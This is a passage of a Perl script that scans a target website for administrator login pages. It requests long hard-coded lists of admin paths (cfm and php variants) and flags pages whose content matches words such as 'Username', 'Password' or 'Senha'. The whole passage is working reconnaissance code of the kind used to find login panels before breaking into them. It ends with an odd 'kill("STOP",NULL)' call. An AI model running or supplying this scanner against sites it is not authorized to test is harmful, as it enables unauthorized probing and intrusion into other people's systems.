4220. my $req=HTTP::Request->new(GET=>$final);
4221. my $ua=LWP::UserAgent->new();
4222. $ua->timeout(30);
4223. my $response=$ua->request($req);
4224.  
4225. if($response->content =~ /Username/ ||
4226. $response->content =~ /Password/ ||
4227. $response->content =~ /username/ ||
4228. $response->content =~ /password/ ||
4229. $response->content =~ /USERNAME/ ||
4230. $response->content =~ /PASSWORD/ ||
4231. $response->content =~ /Senha/ ||
4232. $response->content =~ /senha/ ||
4233. $response->content =~ /Personal/ ||
4234. $response->content =~ /Usuario/ ||
4235. $response->content =~ /Clave/ ||
4236. $response->content =~ /Usager/ ||
4237. $response->content =~ /usager/ ||
4238. $response->content =~ /Sing/ ||
4239. $response->content =~ /passe/ ||
4240. $response->content =~ /P\/W/ ||
4241. $response->content =~ /Admin Password/
4242. ){
4243. print " \n [+] Found -> $final\n\n";
4244. }else{
4245. print "[-] Not Found <- $final\n";
4246. }
4247. }
4248. }
4249.  
4250.  
4251.  
4252.  
4253. # -------------------------------------------------------
4254. # -------------------test cfm ---------------------------|
4255. # -------------------------------------------------------
4256.  
4257.  
4258.  
4259.  
4260.  
4261. if($code eq "cfm"){
4262.  
4263. @path1=('cpanel','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
4264. 'memberadmin/','administratorlogin/','adm/','account.cfm','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm',
4265. 'admin_area/admin.cfm','admin_area/login.cfm','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
4266. 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm',
4267. 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
4268. 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
4269. 'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
4270. 'admin/home.cfm','admin/controlpanel.cfm','admin.cfm','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm','admin/cp.cfm','cp.cfm',
4271. 'administrator/account.cfm','administrator.cfm','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm','administrator/login.cfm',
4272. 'moderator/admin.cfm','controlpanel.cfm','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
4273. 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.cfm','user.html','admincp/index.cfm','admincp/login.cfm','admincp/index.html',
4274. 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
4275. 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
4276. 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.cfm','admin/account.cfm','adminpanel.cfm','webadmin.cfm','webadmin/index.cfm',
4277. 'webadmin/admin.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm','panel-administracion/login.cfm','adminLogin.cfm',
4278. 'admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm','adminarea/admin.cfm','adminarea/login.cfm','admin-login.html',
4279. 'panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm','modelsearch/admin.cfm','administrator/index.cfm',
4280. 'admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','adm/index.cfm',
4281. 'adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.html'
4282. );
4283.  
4284. foreach $ways(@path1){
4285.  
4286. $final=$site.$ways;
4287.  
4288. my $req=HTTP::Request->new(GET=>$final);
4289. my $ua=LWP::UserAgent->new();
4290. $ua->timeout(30);
4291. my $response=$ua->request($req);
4292.  
4293. if($response->content =~ /Username/ ||
4294. $response->content =~ /Password/ ||
4295. $response->content =~ /username/ ||
4296. $response->content =~ /password/ ||
4297. $response->content =~ /USERNAME/ ||
4298. $response->content =~ /PASSWORD/ ||
4299. $response->content =~ /Senha/ ||
4300. $response->content =~ /senha/ ||
4301. $response->content =~ /Personal/ ||
4302. $response->content =~ /Usuario/ ||
4303. $response->content =~ /Clave/ ||
4304. $response->content =~ /Usager/ ||
4305. $response->content =~ /usager/ ||
4306. $response->content =~ /Sing/ ||
4307. $response->content =~ /passe/ ||
4308. $response->content =~ /P\/W/ ||
4309. $response->content =~ /Admin Password/
4310. ){
4311. print " \n [+] Found -> $final\n\n";
4312. }else{
4313. print "[-] Not Found <- $final\n";
4314. }
4315. }
4316. }
4317.  
4318.  
4319.  
4320.  
4321.  
4322. # -------------------------------------------------------
4323. #--------------------------/test-------------------------|
4324. # -------------------------------------------------------
4325.  
4326.  
4327. if($code eq "php"){
4328.  
4329. @path2=('cpanel','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
4330. 'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php',
4331. 'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
4332. 'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html',
4333. 'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
4334. 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
4335. 'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php',
4336. 'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',
4337. 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php',
4338. 'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
4339. 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html',
4340. 'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
4341. 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
4342. 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
4343. 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html',
4344. 'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php',
4345. 'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php',
4346. 'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php',
4347. 'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php'
4348. );
4349.  
4350. foreach $ways(@path2){
4351.  
4352. $final=$site.$ways;
4353.  
4354. my $req=HTTP::Request->new(GET=>$final);
4355. my $ua=LWP::UserAgent->new();
4356. $ua->timeout(30);
4357. my $response=$ua->request($req);
4358.  
4359. if($response->content =~ /Username/ ||
4360. $response->content =~ /Password/ ||
4361. $response->content =~ /username/ ||
4362. $response->content =~ /password/ ||
4363. $response->content =~ /USERNAME/ ||
4364. $response->content =~ /PASSWORD/ ||
4365. $response->content =~ /Senha/ ||
4366. $response->content =~ /senha/ ||
4367. $response->content =~ /Personal/ ||
4368. $response->content =~ /Usuario/ ||
4369. $response->content =~ /Clave/ ||
4370. $response->content =~ /Usager/ ||
4371. $response->content =~ /usager/ ||
4372. $response->content =~ /Sing/ ||
4373. $response->content =~ /passe/ ||
4374. $response->content =~ /P\/W/ ||
4375. $response->content =~ /Admin Password/
4376. ){
4377. print " \n [+] Found -> $final\n\n";
4378. }else{
4379. print "[-] Not Found <- $final\n";
4380. }
4381. }
4382. kill("STOP",NULL);
4383. }}
4384. }